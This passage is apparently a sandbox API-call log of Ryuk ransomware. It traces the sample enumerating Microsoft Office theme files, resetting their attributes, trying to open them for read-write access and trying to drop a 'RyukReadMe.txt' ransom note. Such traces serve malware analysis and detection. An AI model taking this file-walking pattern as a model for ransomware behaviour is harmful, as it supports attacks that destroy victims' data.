dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.521] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.521] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.521] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.521] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.521] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Module.thmx", dwFileAttributes=0x80) returned 0 [0135.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Module.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\module.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.522] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.522] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.522] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.522] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.522] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Newsprint.thmx", dwFileAttributes=0x80) returned 0 [0135.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Newsprint.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\newsprint.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.523] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.523] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.523] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.523] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.523] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Opulent.thmx", dwFileAttributes=0x80) returned 0 [0135.524] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Opulent.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\opulent.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.524] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.524] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.524] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.524] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.524] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Oriel.thmx", dwFileAttributes=0x80) returned 0 [0135.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Oriel.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\oriel.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.525] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.525] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.525] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.525] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.525] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Origin.thmx", dwFileAttributes=0x80) returned 0 [0135.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Origin.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\origin.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.526] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.526] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.526] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.526] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.526] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Paper.thmx", dwFileAttributes=0x80) returned 0 [0135.527] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Paper.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\paper.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.527] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.527] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.527] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.527] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.527] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Perspective.thmx", dwFileAttributes=0x80) returned 0 [0135.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Perspective.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\perspective.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.528] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.528] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.528] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.528] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.528] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Pushpin.thmx", dwFileAttributes=0x80) returned 0 [0135.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Pushpin.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\pushpin.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.529] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.529] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.529] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.529] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.529] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Slipstream.thmx", dwFileAttributes=0x80) returned 0 [0135.530] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Slipstream.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\slipstream.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.530] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.530] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.530] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.530] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.530] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Solstice.thmx", dwFileAttributes=0x80) returned 0 [0135.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Solstice.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\solstice.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.531] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.531] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.531] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.531] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.531] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Technic.thmx", dwFileAttributes=0x80) returned 0 [0135.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Technic.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\technic.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.532] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.532] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.532] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.532] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.533] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Thatch.thmx", dwFileAttributes=0x80) returned 0 [0135.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Thatch.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\thatch.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.533] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.533] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.533] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0135.533] SetLastError (dwErrCode=0x0) [0135.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.534] GetLastError () returned 0x5 [0135.534] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0135.534] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.534] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0135.535] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.536] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.536] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.536] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Adjacency.xml", dwFileAttributes=0x80) returned 0 [0135.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Adjacency.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\adjacency.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.536] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.536] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.537] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.537] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.537] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Angles.xml", dwFileAttributes=0x80) returned 0 [0135.537] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Angles.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\angles.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.537] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.537] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.537] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.537] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.537] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apex.xml", dwFileAttributes=0x80) returned 0 [0135.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apex.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\apex.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.538] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.538] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.538] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.538] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.538] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apothecary.xml", dwFileAttributes=0x80) returned 0 [0135.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apothecary.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\apothecary.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.539] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.539] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.539] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.539] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.539] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Aspect.xml", dwFileAttributes=0x80) returned 0 [0135.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Aspect.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\aspect.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.540] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.540] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.540] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.540] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.540] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Austin.xml", dwFileAttributes=0x80) returned 0 [0135.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Austin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\austin.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.540] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.540] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.540] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.540] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.541] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Black Tie.xml", dwFileAttributes=0x80) returned 0 [0135.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Black Tie.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\black tie.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.541] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.541] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.541] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.541] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.541] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Civic.xml", dwFileAttributes=0x80) returned 0 [0135.541] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Civic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\civic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.541] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.541] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.542] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.542] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.542] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Clarity.xml", dwFileAttributes=0x80) returned 0 [0135.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Clarity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\clarity.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.542] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.542] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.542] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.542] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.542] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Composite.xml", dwFileAttributes=0x80) returned 0 [0135.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Composite.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\composite.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.543] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.543] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.543] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.543] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.543] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Concourse.xml", dwFileAttributes=0x80) returned 0 [0135.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Concourse.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\concourse.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.544] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.544] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.544] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.544] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.544] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Couture.xml", dwFileAttributes=0x80) returned 0 [0135.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Couture.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\couture.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.545] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.545] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.545] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.545] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.545] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Elemental.xml", dwFileAttributes=0x80) returned 0 [0135.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Elemental.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\elemental.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.545] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.545] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.545] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.545] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.546] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Equity.xml", dwFileAttributes=0x80) returned 0 [0135.546] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Equity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\equity.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.546] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.546] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.546] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.546] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.546] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Essential.xml", dwFileAttributes=0x80) returned 0 [0135.546] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Essential.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\essential.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.546] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.546] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.547] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.547] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.547] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Executive.xml", dwFileAttributes=0x80) returned 0 [0135.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Executive.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\executive.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.547] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.547] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.547] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.547] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.547] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Flow.xml", dwFileAttributes=0x80) returned 0 [0135.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Flow.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\flow.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 